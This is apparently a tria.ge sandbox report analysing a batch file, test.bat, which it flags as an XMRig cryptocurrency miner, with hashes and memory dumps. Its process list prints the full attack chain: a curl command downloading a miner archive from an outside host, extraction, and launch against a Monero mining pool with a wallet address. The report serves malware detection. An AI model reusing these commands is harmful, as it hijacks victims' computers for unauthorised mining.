Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

test.bat

windows10-1703-x64

1

test.bat

windows10-2004-x64

10

Resubmissions

10/03/2024, 01:51

240310-caabdshf3y 10

Analysis

  • max time kernel
    145s
  • max time network
    174s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/03/2024, 01:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    test.bat

  • Size

    378B

  • MD5

    a69d85b3cae205a7e5447aa824fed83c

  • SHA1

    ba6e18c3e3841fb119534a69fa5678d4ed0dc298

  • SHA256

    0befb814f43f7c4d24836428077894bd526631ac49911b7a18c998eabe14eb6b

  • SHA512

    312ea294cc0e419b647120c50f2e5f0956e1983ec00c4f76a0615047f8a966e6b299abd4eeaa33338cb8a5f3b77c9cdebb2fe8ab63654314b7c4b2c4bd191626

Score
10/10
xmrigminer

Malware Config

Signatures

  • XMRig Miner payload 11 IoCs
    miner
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Executes dropped EXE 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4764
    • C:\Windows\system32\curl.exe
      curl -O -k https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
      2⤵
        PID:4092
      • C:\Windows\system32\tar.exe
        tar -xf xmrig-6.21.1-gcc-win64.zip
        2⤵
          PID:3588
        • C:\xmrig\xmrig-6.21.1\xmrig.exe
          C:\xmrig\xmrig-6.21.1\xmrig.exe --coin=XMR -o xmr.2miners.com:2222 -u 49QgS4Cu9uqVeqgDpwtdZWYZrDNrUJXfzDiGmwsZFLdEgQPAQV7SbswUHqZG3B45HAiSR1cYZoSvgC56kctnqsSjMNFnJmU.gcloud -p x --cpu-affinity=5 --threads=2 --cpu-no-yield --cpu-priority=5
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:3752

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\xmrig\xmrig-6.21.1-gcc-win64.zip
        Filesize

        3.2MB

        MD5

        e27f13ffb2989f290f16f8edd1c80171

        SHA1

        352a34a66152f4998b8d9152356528f980de2ef5

        SHA256

        fa6214ad822c6a70ee064de975608438a55eac4de41a5bb20f7180895e0524f9

        SHA512

        549a1c129ba53006e664b710361b860f9fdd58dc4682b36733fd3d10c36aa80fb28610d47ec18a8e91dad55542a83b58f5df79a8b9928cbe851b3557fde2b06a

        Download Submit

      • C:\xmrig\xmrig-6.21.1\xmrig.exe
        Filesize

        4.4MB

        MD5

        6291702eff284e5f7a7aa5574a2212ac

        SHA1

        9edae14522611474be6479c718b58a3c353b5d3b

        SHA256

        3afeeb7ede42268560a0270981ae0b8f72930777b793706e8d1f7e461fb17dd2

        SHA512

        2f4d45da2a4ba57486b0c7bde9ab9f5829c57ebd3eaf3bcf6f0e7b3bdf3cf0dac95bc758518b6232ee5c320edde13144f70caad8674f46a143866d4606567aaa

        Download Submit

      • memory/3752-14-0x0000020BA65F0000-0x0000020BA6610000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3752-15-0x00007FF6D5E40000-0x00007FF6D6944000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3752-16-0x0000020BA6640000-0x0000020BA6680000-memory.dmp

        Filesize

        256KB

        Download

      • memory/3752-17-0x0000020BA6680000-0x0000020BA66A0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3752-18-0x00007FF6D5E40000-0x00007FF6D6944000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3752-19-0x00007FF6D5E40000-0x00007FF6D6944000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3752-20-0x00007FF6D5E40000-0x00007FF6D6944000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3752-21-0x0000020BA6680000-0x0000020BA66A0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3752-22-0x00007FF6D5E40000-0x00007FF6D6944000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3752-23-0x00007FF6D5E40000-0x00007FF6D6944000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3752-24-0x00007FF6D5E40000-0x00007FF6D6944000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3752-25-0x00007FF6D5E40000-0x00007FF6D6944000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3752-26-0x00007FF6D5E40000-0x00007FF6D6944000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3752-27-0x0000020BA66A0000-0x0000020BA66C0000-memory.dmp

        Filesize

        128KB

        Download